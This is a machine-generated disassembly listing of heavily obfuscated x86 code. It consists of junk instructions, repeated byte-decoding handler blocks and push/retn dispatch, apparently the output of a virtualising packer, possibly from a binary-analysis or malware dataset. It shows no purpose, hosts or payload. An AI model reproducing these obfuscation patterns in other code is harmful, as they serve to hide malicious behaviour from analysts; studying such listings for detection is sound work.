call sub_10041b3c
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_1006ac6b
xchg ebx ecx
mov ebx [ edx + 0x20 ]
test dl 0xe0
cmc
bt bx 0x6
add ebx eax
pushfd
lea ecx [ edx + 0xa638bc7 ]
ror cx cl
test edi 0x975795b7
mov [ ebp - 0x8 ] 0x0
bsr cx bp
inc cx
push ebp
mov ecx [ edx + 0x18 ]
test ax 0x3597
mov [ esp ] dl
cmp ecx [ ebp - 0x8 ]
mov [ esp ] al
pushad
lea esp [ esp + 0x34 ]
jbe rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
add di 0xacbd
not esi
shl si cl
rol edi cl
sub ecx 0x1
pushad
stc
bswap si
movzx di dl
mov [ ebp - 0x4 ] ecx
lea esi [ ecx - 0x34768140 ]
lea ecx [ edi * 2 - 0x6db54983 ]
rcl cl 0x2
btr edi esp
mov ecx [ ebp - 0x8 ]
sub edi 0x84b74a3b
or si sp
stc
add ecx [ ebp - 0x4 ]
not di
bt bx 0xa
shr ecx 0x1
inc di
mov edi [ ebx + ecx * 4 ]
shr si 0x1
add edi eax
pushfd
movzx esi bl
mov esi [ ebp + 0xc ]
mov [ esp ] 0xfe
pushad
mov [ esp + 0x40 ] eax
push 0x39d2a74f
mov [ esp + 0x4 ] 0xe3
call sub_10068220
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_1006aded
mov edi [ edi + ecx * 4 ]
pushfd
test edi edi
jmp rwxdata
jmp rwxdata
mov [ esp ] dl
pushfd
lea esp [ esp + 0x30 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
cmp dh dh
stc
add eax edi
push 0x5c21670e
cmc
pushad
call sub_1005d0b8
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_100772e4
pushfd
lea esp [ esp + 0x3c ]
jpo rwxdata
jmp rwxdata
push ecx
pushad
push [ esp + 0x4 ]
push edx
push [ esp + 0x28 ]
retn 0x2c
push ecx
pushfd
pushfd
push ecx
mov [ esp + 0x8 ] edx
push [ esp + 0xc ]
retn 0x10
sub_100773d1
[ edi ] [ esi ]
ror di 0x6
cmc
btc di ax
mov edi [ esp + 0x50 ]
sar si cl
ror si 0x3
lea esi [ 0xffffffffc6bb040e ]
mov esi [ esp + 0x54 ]
std
stc
std
bt si 0x1
push [ esp + 0x58 ]
popfd
mov [ esp ] dh
mov [ esp + 0x10 ] ah
lea esp [ esp + 0x5c ]
jmp rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_1007743b
mov [ esp + 0x28 ] esi
push 0x48eb6052
push 0xd1cc5e1
jmp rwxdata
mov [ esp + 0x2c ] edi
push 0x35ce92b
mov [ esp + 0x4 ] ch
pushfd
lea esp [ esp + 0x34 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_1007749e
or eax ecx
mov [ esp ] 0xf9efae14
stc
xor al [ edx ]
lea esp [ esp + 0x10 ]
jae rwxdata
pushfd
pushfd
inc edx
pushad
dec [ ebp ]
mov [ esp + 0x8 ] 0xbda8
pushfd
push [ esp + 0x4 ]
jmp rwxdata
pushfd
inc edx
call sub_10077c62
lea esp [ esp + 0x30 ]
jne rwxdata
bswap cx
cmp bh dh
sub cl dh
bt edi esp
mov ecx eax
cmp ch dh
pushfd
jmp rwxdata
push 0xd9aec7ef
push edx
mov [ ebp ] eax
push [ esp + 0x4 ]
push ebx
pushfd
lea esp [ esp + 0x14 ]
jmp rwxdata
shl eax 0x7
bt sp 0x3
shr ecx 0x19
pushfd
pushfd
bt dx ax
call sub_1007749e
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_10077573
mov [ esp + 0x10 ] edi
pushfd
push [ esp ]
pushad
push [ esp ]
lea esp [ esp + 0x3c ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_10077614
mov [ esp ] bl
mov [ esp + 0x24 ] ebp
pushfd
pushfd
mov [ esp + 0x28 ] edx
mov [ esp ] di
mov [ esp + 0x24 ] esi
mov [ esp + 0x18 ] cx
push ebx
mov [ esp ] dx
push edx
mov [ esp + 0x28 ] edi
push [ esp + 0x4 ]
push [ esp ]
mov [ esp + 0x10 ] 0xfad3
lea esp [ esp + 0x30 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_100777b0
not eax
clc
bt sp ax
not edx
test ah dh
pushad
cmp ch 0x41
and eax edx
pushfd
mov [ esp + 0x8 ] 0xd733f167
jmp rwxdata
mov [ ebp + 0x4 ] eax
mov [ esp + 0xc ] si
lea esp [ esp + 0x2c ]
jge rwxdata
pushad
pushfd
pushad
pushfd
pop [ esp + 0x40 ]
call sub_10078106
pushfd
push 0x2dbcf6c9
mov [ esp ] 0xa
pushad
lea esp [ esp + 0x24 ]
ja rwxdata
push 0x13dc31a6
pushfd
push eax
pushfd
push [ esp + 0x10 ]
pop [ ebp ]
pushad
pushfd
pushfd
lea esp [ esp + 0x3c ]
jmp rwxdata
pop [ ebp ]
pushad
lea esp [ esp + 0x20 ]
jmp rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_100778e2
neg bx
sub esp 0xb4
movzx edi cl
and di 0x9319
sbb ecx 0xd20889cd
xadd bl al
mov edi esp
sbb al dh
not ecx
dec al
bt si 0xd
mov ebx esi
bsf ecx edx
bts cx 0xd
add esi [ ebp ]
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_10077c62
dec [ ebp ]
pushad
mov [ esp ] 0x40
lea esp [ esp + 0x28 ]
jne rwxdata
bswap cx
cmp bh dh
sub cl dh
bt edi esp
mov ecx eax
cmp ch dh
pushfd
jmp rwxdata
pushad
pushad
lea esp [ esp + 0x40 ]
jge rwxdata
shl eax 0x7
bt sp 0x3
shr ecx 0x19
pushfd
pushfd
bt dx ax
call sub_1007749e
pushfd
jmp rwxdata
mov [ ebp ] eax
pushad
lea esp [ esp + 0x20 ]
jmp rwxdata
mov [ ebp ] eax
pushfd
lea esp [ esp + 0x8 ]
jmp rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_10077dad
mov [ esp + 0x8 ] ebx
pushfd
jmp rwxdata
mov [ esp + 0x8 ] esi
pushfd
jmp rwxdata
pushad
push [ esp ]
mov [ esp + 0x2c ] ebp
jmp rwxdata
pushfd
jmp rwxdata
mov [ esp + 0x2c ] edx
jmp rwxdata
pushfd
jmp rwxdata
mov [ esp + 0x2c ] esi
mov [ esp + 0x8 ] cx
pushfd
mov [ esp + 0x2c ] edi
push [ esp ]
push eax
push [ esp ]
lea esp [ esp + 0x38 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_10077e4c
pushfd
mov [ eax + edi ] dl
push ebp
lea esp [ esp + 0x14 ]
jmp rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_10077f3e
mov [ ebp - 0x4 ] ecx
bt di 0xd
or ecx ecx
mov [ esp ] 0xb
lea esp [ esp + 0x28 ]
je rwxdata
call sub_10078148
stc
push esp
pushad
pushad
xor eax eax
pushfd
jmp rwxdata
stc
call sub_100791af
sub_10078106
push [ esp + 0x8 ]
push ebp
mov [ esp + 0x4 ] 0x8a63
push [ esp + 0x4c ]
pop [ ebp ]
mov [ esp + 0x4 ] ebp
mov [ esp ] 0x70
lea esp [ esp + 0x50 ]
jmp rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_1007812a
mov [ esp + 0x24 ] edi
pushfd
mov [ esp ] cl
lea esp [ esp + 0x28 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_100788f3
push edx
pushad
mov [ esp + 0x20 ] eax
push [ esp ]
mov [ esp + 0x20 ] ebx
pushad
mov [ esp + 0x3c ] esi
jmp rwxdata
push [ esp ]
mov [ esp + 0x3c ] ebp
pushfd
mov [ esp ] ch
mov [ esp + 0x3c ] edx
jmp rwxdata
jmp rwxdata
push esi
mov [ esp + 0x3c ] esi
pushfd
push [ esp + 0xc ]
mov [ esp + 0x40 ] edi
pushfd
pushfd
mov [ esp ] 0x58
lea esp [ esp + 0x48 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_10078c01
add ebp 0x4
cmp esp 0xe5905a97
cmc
std
push [ esp + 0x4 ]
popfd
push 0x849492a8
lea esp [ esp + 0xc ]
jmp rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_10078c2b
movzx ecx cl
push ecx
inc al
setge ch
ror al 0x4
rcr ch 0x1
cmp si 0x5980
or ecx 0xef98c43d
sub al 0x7
btc cx 0x7
btr cx dx
test bp si
xor bl al
lea esp [ esp + 0xc ]
jpo rwxdata
bswap ecx
call sub_10078229
lea ecx [ edx * 8 + 0x6a8876eb ]
inc cx
bswap cx
inc esi
rol ch cl
add cx bp
cmc
lea ecx [ edi + 0x2eaa0f29 ]
movzx ecx al
push edi
push [ esp ]
mov [ ebp - 0x4 ] ecx
bt di 0x3
pushfd
call sub_10077ace
sub_10078d05
mov [ esp + 0x44 ] edi
mov [ esp ] 0x5
push esi
push esp
pushfd
lea esp [ esp + 0x50 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_1007912d
mov [ esp + 0x24 ] esi
pushad
jmp rwxdata
mov [ esp + 0x40 ] ebp
pushfd
jmp rwxdata
mov [ esp ] ch
mov [ esp + 0x40 ] edx
mov [ esp + 0x4 ] 0x8
pushfd
jmp rwxdata
mov [ esp + 0x40 ] esi
jmp rwxdata
mov [ esp + 0x3c ] edi
push 0x71cc5b1c
mov [ esp + 0x4 ] bx
lea esp [ esp + 0x40 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_10079160
pushfd
xchg [ ebp ] eax
jmp rwxdata
mov [ esp ] 0xeec8
mov [ esp ] 0x20
mov [ esp + 0xc ] rwxdata
pushad
jmp rwxdata
call sub_10079137
pushfd
pushfd
pop [ esp ]
pushfd
jmp sub_10077c10
sub_100791af
xchg [ ebp + ecx * 4 ] eax
stc
clc
cmp edi 0xfeecfba0
mov [ esp + 0x48 ] eax
bt di bp
mov [ esp + 0x8 ] 0xe2a3
pushfd
sub ecx 0x1
pushfd
mov [ esp + 0x4 ] ch
jmp rwxdata
lea esp [ esp + 0x50 ]
jne rwxdata
call sub_10079210
stc
push edi
stc
sub eax eax
pushfd
call j_sub_10079160
sub_100793a7
dec dh
btc dx cx
or dh 0x42
mov dx [ ebp ]
push ebx
add esi 0x1
mov [ esp ] edx
clc
add ebp 0x2
jmp rwxdata
mov [ eax + edi ] dx
push esi
push edi
mov [ esp + 0x8 ] 0xdd
lea esp [ esp + 0x38 ]
jmp rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_100793e5
neg ecx
bt bp 0x4
bt sp 0x3
test sp bp
cmp bl 0x81
add ecx 0x0
push ecx
lea esp [ esp + 0x10 ]
jo rwxdata
push 0x3de28678
push [ esp ]
mov [ esp + 0x4 ] ecx
push [ esp ]
push [ esp + 0x4 ]
pushad
push [ esp + 0x2c ]
retn 0x30
pushad
push 0x7817f2bb
mov [ esp + 0x20 ] ecx
push 0xe14cc384
pushad
pushfd
pushfd
push [ esp + 0x4c ]
retn 0x50
sub_10079433
pushfd
pushfd
lea esp [ esp + 0x2c ]
ja rwxdata
lea ecx [ 0x7e08a772 ]
cmc
movsx cx cl
mov al [ esi ]
setpe cl
clc
xor al bl
not cl
push 0x365743bb
setno cl
rol al 0x5
dec ch
shld cx di 0x5
not al
bswap cx
or cx sp
pop ecx
shld cx si 0x8
xor al 0xd6
bswap cx
jpe rwxdata
clc
mov edx esp
clc
bsr ax bp
aad 0xde
lea ecx [ edi + 0x40 ]
shl edi cl
sub ecx edx
sub di cx
aad 0xf9
not di
lea eax [ ebp - 0x80 ]
rcl di cl
and al 0xfc
rol di 0xc
bswap di
xor di cx
add di 0x7f85
sub eax ecx
mov di 0x7936
bswap di
mov di di
mov esp eax
bswap di
pushad
movsx di dl
push 0x23e5274f
pushfd
pop [ esp + 0x20 ]
mov di ax
pushad
call sub_10079148
lea ecx [ 0xffffffffabd60e40 ]
shr ch cl
xor bl al
rcr ch 0x5
shld ecx ebx 0x1
movzx eax al
cmc
inc cx
cmc
sbb ch dl
lea esi [ esi + 0x1 ]
jmp rwxdata
sar cl cl
bt ecx esi
xor bl al
pushfd
shl cl cl
shrd cx bx 0x1
rcr ecx cl
movzx eax al
add ch cl
cmc
bts cx 0x5
sbb cx si
lea esi [ esi + 0x1 ]
add ecx 0xb8430c07
btc ecx edx
call sub_100798ff
call sub_100777f8
sub_1007961c
pushfd
sub bx ax
pushfd
cwde
test dh 0xda
pushfd
sub ebp 0x4
push ecx
pushfd
mov [ ebp ] eax
pushfd
lea esp [ esp + 0x44 ]
jmp sub_10077ecb
sub_1003f111
mov [ esp + 0x8 ] rwxdata
pushad
mov [ esp + 0x24 ] eax
mov [ esp + 0x4 ] bp
push eax
mov [ esp ] 0x1a0aaa9f
push [ esp + 0x28 ]
retn 0x2c
j_sub_1004273d
jmp sub_1004273d
sub_1003f522
cmp eax [ ebp - 0x10 ]
mov [ esp ] 0xe2
push [ esp ]
call sub_100648d5
j_sub_10043955
jmp sub_10043955
j_sub_10041c02
jmp sub_10041c02
sub_1004113f
cmp [ ebp + 0x14 ] ecx
jmp sub_1006468b
sub_100411f9
lodsb [ esi ]
call sub_100658cc
sub_100412ce
lea esp [ esp + 0x10 ]
jae rwxdata
call j_sub_1005d07a
push 0x3cb5efe3
pushfd
call sub_10064484
sub_10041363
mov [ esp + 0x40 ] eax
pushfd
push [ esp + 0x44 ]
retn 0x48
sub_100413b7
push [ esp ]
lea esp [ esp + 0x28 ]
call j_sub_10041c02
sub_10041715
pushad
lea eax [ rwxdata ]
mov [ esp + 0x4 ] ch
call sub_10064ec4
sub_100418c1
cmp ecx 0xffff
mov [ esp ] bh
call sub_10065fd6
sub_100418cf
add ecx 0x1
stc
jmp sub_10068c9b
j_sub_1004136f
jmp sub_1004136f
sub_100418dd
mov ebx [ esp + 0x2c ]
jmp sub_10044d23
sub_100419bb
clc
pushfd
test cl 0x17
cmp ebx 0x3
pushfd
call sub_100686e0
sub_10041b3c
imul edx edx 0xa
cmc
bt bp 0x1
jmp sub_1006414a
sub_10041c02
stc
bt esi 0x1
clc
xor ecx ecx
j_sub_10064e3c
jmp sub_10064e3c
sub_10041d30
mov [ esp ] bh
mov [ esp ] eax
jmp sub_10064908
sub_10042116
mov al 0x10
lea esp [ esp + 0x18 ]
call j_sub_1005d07a
j_sub_1004198d
jmp sub_1004198d
sub_1004272f
pushad
cmc
add edi eax
call sub_1005dc38
sub_10042c89
and ebx 0xfff
push 0x56c8f488
add [ ebx + edi ] dx
pushad
lea esp [ esp + 0x28 ]
jmp rwxdata
cmp al 0xd2
pushad
clc
add esi 0x2
jmp rwxdata
call sub_1006708a
sub_10043181
call sub_10060d90
sub_10043186
call sub_1006437d
xor edi edi
int3
sub_10043656
mov edi eax
stc
sbb cx ax
stc
btr cx 0x5
mov ecx 0x104
add esp 0x4
call j_sub_1004136f
sub_1004394a
push 0xdddfd448
pushad
call sub_10064ad0
j_sub_10064266
jmp sub_10064266
j_sub_1005d07a
jmp sub_1005d07a
sub_10044187
mov [ esp + 0x2c ] rwxdata
mov [ esp + 0xc ] 0x162d
pushfd
jmp rwxdata
jmp rwxdata
mov [ esp + 0x2c ] eax
pushfd
push [ esp + 0x30 ]
retn 0x34
sub_1004419c
push 0x9b74dc19
mov [ esp ] cx
lea esp [ esp + 0x50 ]
jne rwxdata
push 0x6c2d4cd6
jmp rwxdata
call sub_10065d67
mov al [ ecx ]
call sub_10077273
sub_1004438d
pushad
mov [ esp + 0x10 ] esi
lea esp [ esp + 0x2c ]
ja rwxdata
push 0xf042f6e6
pushad
push 0x9d3c0faa
call sub_100646b7
call sub_100419c9
call sub_100665b5
j_sub_1006988a
jmp sub_1006988a
sub_10044599
mov eax [ esp + 0x4c ]
call sub_1005ca9f
j_sub_10060d89
jmp sub_10060d89
j_sub_100658d8
jmp sub_100658d8
sub_10044a7b
bsf di di
mov edi [ edx + 0x24 ]
call sub_1004272f
sub_10044d23
push edi
mov edi [ esp + 0x34 ]
movzx si bl
mov esi [ esp + 0x38 ]
call sub_10043186
sub_10044d35
push 0x929bc0df
pushfd
mov [ esp + 0xc ] edi
jmp rwxdata
call sub_100674f5
sub_10044fa2
test edi edi
jmp sub_100660c8
sub_10044ffa
mov esi [ ebp + 0xc ]
push 0x7b8ec40c
mov [ esp + 0x4 ] dh
mov [ esp ] ah
mov [ esp + 0x4 ] eax
mov al 0x7b
pushfd
lodsb [ esi ]
clc
call j_sub_1005db50
sub_1005ca59
not al
cmc
neg al
jmp sub_1006ab1b
sub_1005ca9f
call sub_10069284
sub_1005cc35
mov [ esp + 0x10 ] ebx
push [ esp + 0x4 ]
call sub_1006557c
sub_1005cc5e
add edi eax
call sub_1006a74d
sub_1005ce4d
test ebx ecx
test bh 0x94
sub esi eax
jmp j_sub_10060d89
sub_1005d031
call sub_100413db
sub_1005d068
mov ebp ecx
mov ebp [ esp + 0x8 ]
push 0xdb6074be
push [ esp + 0x10 ]
retn 0x1c
sub_1005d07a
pushad
lea esp [ esp + 0x24 ]
call sub_100419c9
call sub_1004394a
sub_1005d089
pushfd
mov [ esp ] 0x52544019
call sub_10065083
_start
jmp sub_1005d089
sub_1005d751
pushfd
push eax
mov ecx [ esp + 0x3c ]
call sub_10042ca9
sub_1005d937
mov [ esp ] 0xcd7e
bt di 0x1
add eax edi
jmp sub_10068e42
sub_1005db50
cmc
not al
pushad
neg al
bt bp bp
bt bp 0x3
pushfd
ror al 0x2
push [ esp ]
push [ esp ]
jmp rwxdata
call sub_10067094
j_sub_1006ade5
jmp sub_1006ade5
j_sub_100639d5
jmp sub_100639d5
sub_10060d89
[ edi ] [ esi ]
call sub_1006609e
sub_10060d90
call sub_10068c7d
sub_10060da9
cmc
mov ecx [ ebp - 0x8 ]
call sub_10040bec
sub_10062f41
mov [ esp + 0x2c ] eax
pushfd
pushfd
push [ esp ]
mov [ esp + 0x4 ] 0x6d
push [ esp + 0x38 ]
retn 0x3c
sub_10063110
inc ecx
push 0x84c8ddd5
call sub_10042116
sub_100631f7
inc ecx
lea esp [ esp + 0x4 ]
pushad
call sub_1005d75c
sub_1006321a
push ecx
lea esp [ esp + 0x14 ]
jb rwxdata
pushad
jmp rwxdata
pushad
bt cx di
call j_sub_1006ade5
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_10063472
jmp rwxdata
stosb [ edi ]
pushfd
pushad
push [ esp + 0x4 ]
lea esp [ esp + 0x30 ]
jmp rwxdata
call sub_100668e2
sub_10063493
stosb [ edi ]
mov [ esp ] 0x2d
pushad
push esp
pushfd
lea esp [ esp + 0x4c ]
jmp rwxdata
call sub_100668e2
sub_100634a4
pushfd
mov [ esp + 0x4 ] ebx
call sub_10065fc5
sub_100639d5
mov [ esp ] 0x137a7368
pushad
pushfd
pushad
mov [ esp ] 0x3e
lea esp [ esp + 0x44 ]
jmp j_sub_10077f91
sub_10064473
pushad
mov [ edi - 0x1 ] 0x0
push [ esp ]
lea esp [ esp + 0x30 ]
jmp rwxdata
lahf
lea eax [ eax + 0x1deff11f ]
call sub_100634a4
sub_10064493
pushfd
lea esp [ esp + 0x8 ]
jg rwxdata
jmp sub_10066f3c
je rwxdata
add bx 0x2b9e
clc
mov bx [ esi ]
stc
call sub_10042c89
pushfd
jmp sub_10044966
sub_1006465e
mov ah al
jmp sub_10067067
sub_10064665
pushfd
pushfd
mov [ esp + 0x4 ] si
lea esp [ esp + 0x8 ]
call sub_100419c9
call sub_10042727
sub_1006467f
bt ecx 0x1b
cmc
sub al 0x61
jmp j_sub_100413b7
sub_10064908
lodsb [ esi ]
stc
not al
stc
neg al
call sub_10064bc3
j_sub_1005ce9a
jmp sub_1005ce9a
sub_10064d0b
lea esp [ esp + 0xc ]
jne rwxdata
call sub_10041d30
shl di 0x1
call sub_10044a7b
sub_10064e03
call sub_1005d031
sub_10064ec4
call sub_10076b18
pushfd
lea esp [ esp + 0x44 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
call j_sub_10064266
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_1006506e
lea esp [ esp + 0x4 ]
jae rwxdata
pushad
jmp rwxdata
push ebp
pushfd
call j_sub_1004438d
lea esp [ esp + 0x20 ]
call j_sub_10064e3c
sub_10065083
mov [ esp ] 0x641eeec1
pushad
push 0xcf8475fb
pushad
lea esp [ esp + 0x44 ]
jmp sub_100788f3
sub_10065401
pushad
cmp ebx 0x1
